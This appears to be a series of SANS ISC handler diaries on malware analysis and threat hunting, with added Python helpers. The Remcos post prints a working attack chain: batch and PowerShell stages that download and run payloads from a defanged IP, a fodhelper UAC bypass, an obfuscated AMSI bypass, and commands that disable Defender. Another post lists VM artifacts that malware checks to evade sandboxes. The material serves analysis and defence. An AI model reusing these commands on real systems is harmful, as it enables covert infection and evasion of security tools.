Diaries

Published: 2022-09-26

Easy Python Sandbox Detection

Many malicious Python scripts implement a sandbox detection mechanism (I already wrote diaries about this[1]), but it requires extra code in the script. Because we are lazy (attackers too), why not delegate this to a library and detect the presence of a sandbox with a single call?

I spotted an interesting script (VT score 3/60) that uses a Python library I had never seen before: "sandboxed". It exposes a function that returns a "certainty" score that the script is running in a sandbox, and the script bails out when that score is high enough:

from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty)>0.5:
    sys.exit()
import zlib,base64,ssl,socket,struct,time
[...]

Note the int() cast in the check: if is_sandboxed() returns a fractional score, as the variable name and the 0.5 threshold suggest, int() truncates anything below 1.0 to 0, so the script only exits when the library is completely sure. The library project repository[2] explains the checks performed:

  • Machine specifications
  • File systems
  • Internet access

For sure, it's not bulletproof, but it could probably spot a lot of sandboxes! Note that this module focuses on Windows sandboxes: I had a look at the code, and it only references Windows artifacts (VirtualBox and VMware driver files, plus the guest-tool processes of VirtualBox, Xen, VMware, QEMU and Parallels):

_FILES = [
    r"C:\WINDOWS\system32\drivers\VBoxMouse.sys",
    r"C:\WINDOWS\system32\drivers\VBoxGuest.sys",
    r"C:\WINDOWS\system32\drivers\VBoxSF.sys",
    r"C:\WINDOWS\system32\drivers\VBoxVideo.sys",
    r"C:\WINDOWS\system32\vboxdisp.dll",
    r"C:\WINDOWS\system32\vboxhook.dll",
    r"C:\WINDOWS\system32\vboxmrxnp.dll",
    r"C:\WINDOWS\system32\vboxogl.dll",
    r"C:\WINDOWS\system32\vboxoglarrayspu.dll",
    r"C:\WINDOWS\system32\vboxoglcrutil.dll",
    r"C:\WINDOWS\system32\vboxoglerrorspu.dll",
    r"C:\WINDOWS\system32\vboxoglfeedbackspu.dll",
    r"C:\WINDOWS\system32\vboxoglpackspu.dll",
    r"C:\WINDOWS\system32\vboxoglpassthroughspu.dll",
    r"C:\WINDOWS\system32\vboxservice.exe",
    r"C:\WINDOWS\system32\vboxtray.exe",
    r"C:\WINDOWS\system32\VBoxControl.exe",
    r"C:\WINDOWS\system32\drivers\vmmouse.sys",
    r"C:\WINDOWS\system32\drivers\vmhgfs.sys",
    r"C:\WINDOWS\system32\drivers\vmusbmouse.sys",
    r"C:\WINDOWS\system32\drivers\vmkdb.sys",
    r"C:\WINDOWS\system32\drivers\vmrawdsk.sys",
    r"C:\WINDOWS\system32\drivers\vmmemctl.sys",
    r"C:\WINDOWS\system32\drivers\vm3dmp.sys",
    r"C:\WINDOWS\system32\drivers\vmci.sys",
    r"C:\WINDOWS\system32\drivers\vmsci.sys",
    r"C:\WINDOWS\system32\drivers\vmx_svga.sys",
]

_PROCESSES = [
    "vboxservices.exe",
    "vboxservice.exe",
    "vboxtray.exe",
    "xenservice.exe",
    "VMSrvc.exe",
    "vemusrvc.exe",
    "VMUSrvc.exe",
    "qemu-ga.exe",
    "prl_cc.exe",
    "prl_tools.exe",
    "vmtoolsd.exe",
    "df5serv.exe",
]
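If you operate a sandbox, the useful question is which of these artifacts your own analysis VM exposes. The example below is an added one (my code, not the sandboxed library's): it reproduces the file and process checks as a function with injectable inputs, so it can be unit-tested away from a Windows box, and only a subset of the two lists above is copied in. The score it computes (fraction of artifacts found) is my own simplification, not the library's algorithm. The last two functions show the effect of the int() cast in the sample's check.

```python
import os
import platform
import subprocess

# Subset of the artifact lists above (same entries, fewer of them)
VM_FILES = [
    r"C:\WINDOWS\system32\drivers\VBoxMouse.sys",
    r"C:\WINDOWS\system32\drivers\VBoxGuest.sys",
    r"C:\WINDOWS\system32\vboxservice.exe",
    r"C:\WINDOWS\system32\drivers\vmmouse.sys",
    r"C:\WINDOWS\system32\drivers\vmhgfs.sys",
    r"C:\WINDOWS\system32\drivers\vmci.sys",
]
VM_PROCESSES = ["vboxservice.exe", "vboxtray.exe", "xenservice.exe",
                "qemu-ga.exe", "prl_tools.exe", "vmtoolsd.exe"]


def running_processes():
    """Image names of running processes: tasklist on Windows, ps elsewhere."""
    if platform.system() == "Windows":
        out = subprocess.run(["tasklist", "/fo", "csv", "/nh"],
                             capture_output=True, text=True).stdout
        return [line.split('","')[0].strip('"') for line in out.splitlines() if line]
    out = subprocess.run(["ps", "-eo", "comm="], capture_output=True, text=True).stdout
    return [line.strip() for line in out.splitlines() if line.strip()]


def check_artifacts(path_exists=os.path.exists, processes=None):
    """Return (hits, score): the artifacts present and the fraction found.

    path_exists and processes are injectable so the check can be exercised
    with fake data; by default the real file system and process list are used.
    The score is my simplification, not the library's scoring.
    """
    procs = {p.lower() for p in (processes if processes is not None else running_processes())}
    hits = [f for f in VM_FILES if path_exists(f)]
    hits += [p for p in VM_PROCESSES if p.lower() in procs]
    score = len(hits) / (len(VM_FILES) + len(VM_PROCESSES))
    return hits, score


def sample_check(certainty):
    """The comparison exactly as written in the malicious script: int() truncates first."""
    return int(certainty) > 0.5


def intended_check(certainty):
    """What the author presumably meant: bail out on any score above 0.5."""
    return certainty > 0.5
```

Run check_artifacts() with no arguments on the sandbox itself; every entry it returns is something the guest tools or drivers leak to the malware, and sample_check(0.9) being False while intended_check(0.9) is True is the bug that makes this particular script far less paranoid than its author thought.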

[1] https://isc.sans.edu/forums/diary/Sandbox+Evasion+Using+NTP/26534
[2] https://github.com/frederikme/sandboxed

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Published: 2022-09-25

Downloading Samples From Takendown Domains

Sometimes I want to download a sample from a malicious server, but the domain name no longer resolves (it has been taken down).

In that case, I search historical DNS data for the IPv4 address of the server. And then connect to the server via its IPv4 address, like this:

That often fails, because the server is hosting many sites.

In that case, I add a Host header with the domain name:

This works regularly for me, because the domain has been taken down, but the server/file not (yet).

For TLS, we will get an error:

That's because we are connecting to an IPv4 address instead of the domain name: the certificate the server presents is not issued for that address (and without a domain name, no SNI is sent either).

In that case, I use option --insecure to ignore certificate errors:

When I download samples, I also use other options to go over a proxy/Tor and to log extra information, like response headers and a trace.
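Here is the same workflow as a Python function, an added example that is not Didier's code (his curl commands are in the screenshots above). It connects to the IPv4 address found in historical DNS, sends the original domain in the Host header and, for HTTPS, also in the TLS SNI, which plain "curl https://<ip>/" cannot do and which is what curl's --resolve option achieves; because the certificate is then checked against the real domain name, a still-valid certificate passes without disabling verification, and the --insecure equivalent is only used when asked. The proxy/Tor and trace options are left out. The selftest() helper, the throwaway local HTTP server it starts and the hostname takendown.example are constructed for the test.

```python
import http.client
import http.server
import socket
import ssl
import threading
from urllib.parse import urlsplit


class SniPinnedHTTPSConnection(http.client.HTTPSConnection):
    """TLS connection to an IP address that still sends the real hostname in SNI."""

    def __init__(self, ip, port, sni, context, timeout=30):
        super().__init__(ip, port, context=context, timeout=timeout)
        self._sni = sni

    def connect(self):
        sock = socket.create_connection((self.host, self.port), self.timeout)
        # server_hostname drives both the SNI extension and certificate name checking
        self.sock = self._context.wrap_socket(sock, server_hostname=self._sni)


def fetch_sample(url, ip, port=None, insecure=False, timeout=30):
    """Fetch url from ip, keeping the original Host header and SNI.

    Returns (status, headers, body). insecure=True skips certificate validation
    entirely (curl --insecure); keep it off unless validation is what fails.
    """
    parts = urlsplit(url)
    host = parts.hostname
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    if parts.scheme == "https":
        ctx = ssl.create_default_context()
        if insecure:
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
        conn = SniPinnedHTTPSConnection(ip, port or parts.port or 443, host, ctx, timeout)
    else:
        conn = http.client.HTTPConnection(ip, port or parts.port or 80, timeout=timeout)
    conn.putrequest("GET", path, skip_host=True)
    conn.putheader("Host", host)  # what curl -H "Host: ..." does
    conn.putheader("User-Agent", "Mozilla/5.0")
    conn.endheaders()
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, dict(resp.getheaders()), body


def selftest():
    """Constructed check: a local one-shot HTTP server records the Host header it received."""
    seen = {}

    class Handler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            seen["host"] = self.headers.get("Host")
            seen["path"] = self.path
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"sample-bytes")

        def log_message(self, *args):
            pass

    srv = http.server.HTTPServer(("127.0.0.1", 0), Handler)
    worker = threading.Thread(target=srv.handle_request, daemon=True)
    worker.start()
    status, _, body = fetch_sample("http://takendown.example/kit/a.exe", "127.0.0.1",
                                   port=srv.server_address[1])
    worker.join()
    srv.server_close()
    return status, seen["host"], seen["path"], body
```

For a real download, call fetch_sample("https://taken-down.domain/path/sample.exe", "<historical IPv4>") and write the returned body to disk; the shared-hosting server sees the same Host header and SNI it would have seen before the takedown.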

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-24

Maldoc Analysis Info On MalwareBazaar

When you look up a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

So if you suspect that a document you received is malicious, you can look it up on, or submit it to, MalwareBazaar and get an initial analysis without any local tools.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com


Published: 2022-09-23

Kids Like Cookies, Malware Too!

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%\Microsoft\Teams\Cookies
%AppData%\Microsoft\Teams\Local Storage\leveldb

After reading this, I was curious to see if this was already being exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit: a DLL was uploaded that contained one of the two strings above.

The file was called "RwWork.dll" (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file indeed looks for Teams cookies, and for much more:

As you can see, many cookie stores are searched, not only the Teams one. The malware belongs to the Floxif family...
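To run the same hunt locally (an added example, not the VT rule I used), remember that Windows binaries often store paths as UTF-16LE, so an ASCII-only grep for the two strings above misses a good share of samples. The function below searches for both encodings; the %AppData% prefix is left out of the needles because a binary may build the path from an API call rather than the environment variable. The SAMPLE blob is a constructed stand-in for a DLL, carrying one path in each encoding.

```python
TEAMS_TOKEN_PATHS = [
    r"\Microsoft\Teams\Cookies",
    r"\Microsoft\Teams\Local Storage\leveldb",
]


def find_teams_token_paths(data: bytes):
    """Return (path, encoding, offset) for every occurrence, ASCII or UTF-16LE, by offset."""
    hits = []
    for path in TEAMS_TOKEN_PATHS:
        for enc in ("ascii", "utf-16-le"):
            needle = path.encode(enc)
            start = 0
            while (idx := data.find(needle, start)) != -1:
                hits.append((path, enc, idx))
                start = idx + len(needle)
    return sorted(hits, key=lambda h: h[2])


def hunt_file(filename):
    """Convenience wrapper for a file on disk."""
    with open(filename, "rb") as fh:
        return find_teams_token_paths(fh.read())


# Constructed stand-in for a PE: padding, one wide string, padding, one narrow string
SAMPLE = (b"\x00" * 16
          + r"%AppData%\Microsoft\Teams\Cookies".encode("utf-16-le")
          + b"\x00" * 8
          + br"%AppData%\Microsoft\Teams\Local Storage\leveldb"
          + b"\x00" * 4)
```

The wide-string case is the one an ASCII "strings" pass or a plain YARA text string without the "wide" modifier silently misses.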

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Published: 2022-09-22

RAT Delivered Through FODHelper

I found a simple batch file that drops a Remcos[1] RAT through an old UAC bypass technique based on "fodhelper.exe" ("Features On Demand Helper"), a Microsoft-signed binary that auto-elevates. When launched, it looks up the HKCU\Software\Classes\ms-settings\shell\open\command registry key and, if present, executes its content with high integrity; because HKCU is writable by the user, no prompt is shown. Note that the bypass only applies to a local administrator running with UAC at its default level: with "Always notify", auto-elevation is not silent.

The script, called "2.bat", is very simple. Note that, opened in a text editor, it displays Chinese characters: the file starts with a UTF-16LE byte order mark (FF FE) but the rest is plain ASCII, so an editor honouring the BOM pairs up ASCII bytes into bogus CJK code units. cmd.exe does not honour the BOM and treats those two bytes as the start of the first line, which is why that line is "&cls": the bogus token before the "&" fails as an unknown command and the cls wipes the error message off the screen:

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat 
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66  ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a  f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f  Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368  r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365  o         Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65   wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e   Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620  ....CERTUTIL -f 

Here is the decoded script:

cls
@echo off 
Title %~n0
Mode 60,3 
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 
cls
"%Temp%\2.bat"
Exit
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----

certutil.exe (a common LOLBin) is used to decode the Base64 data present in the file itself, write a new batch file and launch it. certutil only considers what lies between the -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- markers, so the batch header above them is ignored; "%~f0" expands to the full path of the running batch file. Here is the decoded bat file:

@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0 

Once fodhelper is launched, it executes adhd.bat, which is packed with the same certutil trick:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K
-----END CERTIFICATE-----

The decoded Base64 contains:

@echo off
echo Almost finished: it will autoruns in less than 15 seconds!
cd %USERPROFILE%\Links\
PowerShell -ExecutionPolicy Bypass -File "puedo.ps1"
echo Almost finished: it will autoruns in less than 15 seconds!
timeout 10 > nul
start net.vbs
exit
Del %~0 
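Rather than running certutil on an analysis box, the stages can be unwrapped offline. The following is an added example (mine, not part of the sample) that mimics what certutil -decode does: it takes whatever sits between the BEGIN/END CERTIFICATE markers, ignores the batch header, and Base64-decodes it; peel_layers() follows nested stages, since 2.bat unpacks adhd.bat which unpacks a third script. ADHD_BAT is the adhd.bat stage quoted above, embedded verbatim.

```python
import base64
import re

# certutil -decode only looks between these markers; everything else in the file is ignored
BLOB_RE = re.compile(rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.DOTALL)


def decode_certutil_blob(text: bytes):
    """Return the payload certutil -decode would write for this file, or None if no blob."""
    m = BLOB_RE.search(text)
    if not m:
        return None
    b64 = re.sub(rb"\s+", b"", m.group(1))
    b64 += b"=" * (-len(b64) % 4)          # tolerate blobs written without padding
    return base64.b64decode(b64)


def peel_layers(text: bytes, max_depth: int = 8):
    """Follow nested certutil stages (2.bat -> adhd.bat -> ...) and return each decoded layer."""
    layers = []
    current = text
    for _ in range(max_depth):
        decoded = decode_certutil_blob(current)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


# The adhd.bat stage from the diary, header included (the header is what certutil skips)
ADHD_BAT = rb"""cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K
-----END CERTIFICATE-----
"""
```

For a file from disk, pass open(path, "rb").read() to peel_layers(); each returned layer is the next script in the chain, and the loop stops at the first layer that carries no certificate markers.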

The PowerShell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit

Note that the script first tries to neuter AMSI (flipping the amsiInitFailed field through reflection, hence the obfuscated string concatenation) and to switch off Microsoft Defender's real-time and IOAV protection, then excludes the whole C: drive from scanning. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{
    "c2": [
        "171[.]22[.]30[.]7:5578"
    ],
    "attr": {
        "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
        "copy_file": "Isass.exe",
        "hide_file": false,
        "copy_folder": "Microsoft Updater",
        "delete_file": false,
        "keylog_file": "logs.dat",
        "keylog_flag": false,
        "audio_folder": "MicRecords",
        "install_flag": true,
        "install_path": "%ProgramFiles%",
        "keylog_crypt": false,
        "mouse_option": false,
        "connect_delay": "0",
        "keylog_folder": "remcos",
        "startup_value": "Windows Host Controller",
        "screenshot_flag": false,
        "screenshot_path": "%AppData%",
        "screenshot_time": "10",
        "connect_interval": "1",
        "hide_keylog_file": false,
        "screenshot_crypt": false,
        "audio_record_time": "5",
        "screenshot_folder": "Screenshots",
        "take_screenshot_time": "5",
        "take_screenshot_option": false
    },
    "rule": "Remcos",
    "botnet": "Papero",
    "family": "remcos"
}

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Published: 2022-09-21

Phishing Campaigns Use Free Online Resources

A phishing campaign needs resources: bandwidth, CPU, storage, ... For a very long time, a lot of phishing kits have been hosted on compromised servers, most often CMS installations that are misconfigured or outdated. I think WordPress is number one in this category. Be careful: that does not mean WordPress is a bad CMS; most vulnerabilities are introduced through plugins. Once a site is compromised, the phishing kit files are copied to the server and are usually reachable below /wp-content/ (often in the uploads/ or plugins/ directories).

I receive a lot of phishing emails daily, via my own platform or submitted by readers, and I see a slight move away from compromised servers towards free online services. The Internet is full of "*aaS" websites, "Something as a Service" (forms, storage, ...). Many platforms offer a free tier to attract customers, and most of the time these free accounts let attackers upload malicious content.

Compromised CMS have issues (from the attacker's point of view):

  1. You need to search for and compromise new servers constantly
  2. Those servers' IP addresses or domains are quickly indexed in block lists
  3. If a server has been compromised once, it may be compromised again by a competitor
  4. Servers might be limited in resources (bandwidth, CPU, ...)
  5. The server might be cleaned by the owner or admin (or not ;-)

Free services, on the other hand, have huge advantages:

  1. They can't easily be blocked: their IP addresses and domains are shared with legitimate users, so adding them to block lists breaks real traffic
  2. They offer plenty of resources and are reliable
  3. Malicious traffic may remain below the radar for a while

Let's review some examples. If you need to host files (logos, scripts, ...), files.catbox.moe will be helpful:

If you want to host a form and get the submitted data delivered straight to your mailbox, formsubmit.co will do:

Other services look more "technical" but can also be abused by attackers, like ipfs.io:

Here is an example of a link found in the wild:

https://ipfs.io/ipfs/bafkreialspsmcfrukiforbhy4onop7yasjotzehubagyuxhw5rpcafsxmm#xavier@<domain>

(The link is gone now.) Note the fragment after the "#": the kit typically reads the victim's email address from it with JavaScript to pre-fill the login form, and since a browser never sends the fragment to the server, the address does not show up in the gateway's logs.
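A mail gateway or SOC script can pull the same signals out of a URL. The function below is an added example (mine, not from the diary): it maps the host to one of the free services mentioned above, recognises an IPFS gateway by its /ipfs/ or /ipns/ path regardless of which gateway domain fronts the content, and extracts a pre-filled email address from the fragment. The FREE_HOSTS table is a starting point limited to the services named here, and the gateway.example host and the two email addresses in the test are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Free services seen abused in this diary; extend to taste
FREE_HOSTS = {
    "files.catbox.moe": "catbox",
    "formsubmit.co": "formsubmit",
    "ipfs.io": "ipfs-gateway",
}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def classify_phishing_url(url: str) -> dict:
    """Return the abused service (if any), the IPFS CID and any pre-filled victim email."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    segments = parts.path.split("/")  # "/ipfs/<cid>/..." -> ["", "ipfs", "<cid>", ...]
    is_ipfs_path = len(segments) > 2 and segments[1] in ("ipfs", "ipns")
    # the path, not the host, identifies IPFS content: any gateway can serve the same CID
    service = FREE_HOSTS.get(host) or ("ipfs-gateway" if is_ipfs_path else None)
    # the fragment never reaches the server, so this is the only place to see the target
    match = EMAIL_RE.search(unquote(parts.fragment))
    return {
        "host": host,
        "service": service,
        "cid": segments[2] if is_ipfs_path else None,
        "prefilled_email": match.group(0) if match else None,
    }
```

When the result carries both a free-hosting service and a pre-filled email, you have a strong indicator that the link is a credential-harvesting page built for that recipient, and the CID lets you pivot to other gateways still serving the same content after ipfs.io takes it down.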

The web is full of motivated people who offer resources for free (I remember offering free Linux shells in the 2000s). Be careful: if you offer a free service, chances are it will be discovered and abused by attackers!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Published: 2022-09-19

Chainsaw: Hunt, search, and extract event log records


I first spotted Chainsaw courtesy of Florian Roth's Twitter feed, given that Chainsaw uses Sigma as one of its rule engines. Chainsaw is a standalone tool that provides a simple and fast method to triage Windows event logs and identify interesting elements within them while applying detection logic (Sigma and Chainsaw rules) to detect malicious activity. Chainsaw's 'first-response' capability offers a generic and fast method of searching through event logs for keywords (Kornitzer & D, 2022).

The Chainsaw project documentation is robust. As always, read up on the project before use; it builds on other great projects as well. James and Alex have provided all you need to get started in short order.

I conducted my first experiment using logs from a DFIR consulting gig I had circa 2014 with an impacted manufacturing firm. The victim user and system names have been changed to protect the innocent.
The environment was a very flat Windows environment with a .local domain that was not administered in keeping with best practices. The organization’s controllers were compromised, both the accountant and the domain ;-), leading to a significant financial loss for the organization. As such, I’ve simply changed the user name to CONTROLLER, and the domain to victimsystems.local. The related logs from this event, for purposes of this experiment, were stored in logs/client. In order to change names as described I simply wrote the results to a text file when running Chainsaw as follows:

chainsaw hunt logs/client/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml > results\results.txt

I also ran Chainsaw this way after I discovered that results written to the console are more comprehensive than those written to CSV with the --csv --output results option. This run used Sigma rules only, as selected via -s sigma/.

Figure 1: First Chainsaw experiment

The results were revealing, and in keeping with my original investigation eight years ago. The victim system was thoroughly infested with malware, amongst which I'd identified Trojan.Agent.FSAVXGen, also known as Backdoor:Win32/Simda, a backdoor usually dropped by other malware or downloaded by users visiting malicious sites. Chainsaw's results revealed this malware in the victim system's Security log via the Sigma rules Failed Code Integrity Checks and Remote Service Creation, as seen in Figure 2.

Figure 2: Chainsaw reveals Backdoor:Win32/Simda

Note the kernel-mode driver and a service named xina.exe, but the real IOC is the failed code integrity check for l3codeca.acm, a common indicator for this malware.

My second experiment used Florian's APT Simulator on one of my Windows systems. APTSimulator is exactly what it says it is: a Windows batch script that uses a set of tools and output files to make a system look as if it was compromised (Roth, 2022).
I chose to run every option, which is complete overkill but fun nonetheless. I then saved the system's Security event log as APTsim.evtx and ran it through Chainsaw as follows:

chainsaw hunt logs/APTsim.evtx -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/ > results\APTsimResults.txt

Note that this run included -r rules/, which adds Chainsaw's built-in rule set. From the APTsim.evtx assessment, Chainsaw rules identified Account Tampering (APT Simulator added an account to the local Administrators group), while Sigma rules flagged Generic Password Dumper Activity on LSASS (procdump64.exe), Remote Service Creation (PSEXESVC.EXE), and Rare Schtasks Creations (falshupdate22).
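To show what the rule engine is doing under the hood, here is an added example (my code, not Chainsaw's and not the real Sigma rules) that implements the Sigma selection semantics Chainsaw applies (exact match, |contains, |endswith) and runs five rules shaped after the ones named in the two experiments over constructed events. The real Sigma rules carry more conditions and filters (the LSASS rule whitelists legitimate processes, the schtasks rule is count-based), so these are simplified shapes, and the SAMPLE_EVENTS are constructed to look like what the two runs surfaced.

```python
# Minimal Sigma-style matcher: field == value, field|contains, field|endswith
RULES = [
    {"title": "Failed Code Integrity Checks", "channel": "Security",
     "selection": {"EventID": 5038}},
    {"title": "Remote Service Creation", "channel": "System",
     "selection": {"EventID": 7045, "ServiceName|contains": "PSEXESVC"}},
    {"title": "Generic Password Dumper Activity on LSASS", "channel": "Security",
     "selection": {"EventID": 4656, "ObjectName|endswith": "\\lsass.exe",
                   "ProcessName|endswith": "\\procdump64.exe"}},
    {"title": "Account Tampering: Member Added to Local Administrators", "channel": "Security",
     "selection": {"EventID": 4732, "TargetUserName": "Administrators"}},
    {"title": "Rare Schtasks Creations", "channel": "Security",
     "selection": {"EventID": 4698, "TaskName|contains": "falshupdate"}},
]


def _match(value, op, expected):
    if value is None:
        return False
    if op == "contains":
        return str(expected).lower() in str(value).lower()
    if op == "endswith":
        return str(value).lower().endswith(str(expected).lower())
    return value == expected


def rule_matches(rule, event):
    """All selection fields must match (Sigma 'selection' is an AND over its fields)."""
    if event.get("Channel") != rule["channel"]:
        return False
    for key, expected in rule["selection"].items():
        field, _, op = key.partition("|")
        if not _match(event.get(field), op, expected):
            return False
    return True


def hunt(events, rules=RULES):
    """Return (rule title, record number) for every event a rule fires on."""
    return [(rule["title"], ev["RecordNumber"])
            for ev in events for rule in rules if rule_matches(rule, ev)]


# Constructed events in the shape of the ones Chainsaw surfaced above
SAMPLE_EVENTS = [
    {"RecordNumber": 1, "Channel": "Security", "EventID": 5038,
     "FileNameBuffer": "\\Device\\HarddiskVolume1\\Windows\\System32\\l3codeca.acm"},
    {"RecordNumber": 2, "Channel": "System", "EventID": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"RecordNumber": 3, "Channel": "Security", "EventID": 4656,
     "ObjectName": "\\Device\\HarddiskVolume1\\Windows\\System32\\lsass.exe",
     "ProcessName": "C:\\Tools\\procdump64.exe"},
    {"RecordNumber": 4, "Channel": "Security", "EventID": 4732,
     "TargetUserName": "Administrators", "MemberName": "-"},
    {"RecordNumber": 5, "Channel": "Security", "EventID": 4698, "TaskName": "\\falshupdate22"},
    {"RecordNumber": 6, "Channel": "System", "EventID": 7045,
     "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},  # benign
]
```

Event 6 is there to show that a service install alone is not a hit; only the PSEXESVC name triggers the remote service creation rule, which is exactly how the Sigma rule separates PsExec from an ordinary service install.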

Figure 3: Chainsaw identifies APT Simulator behaviors

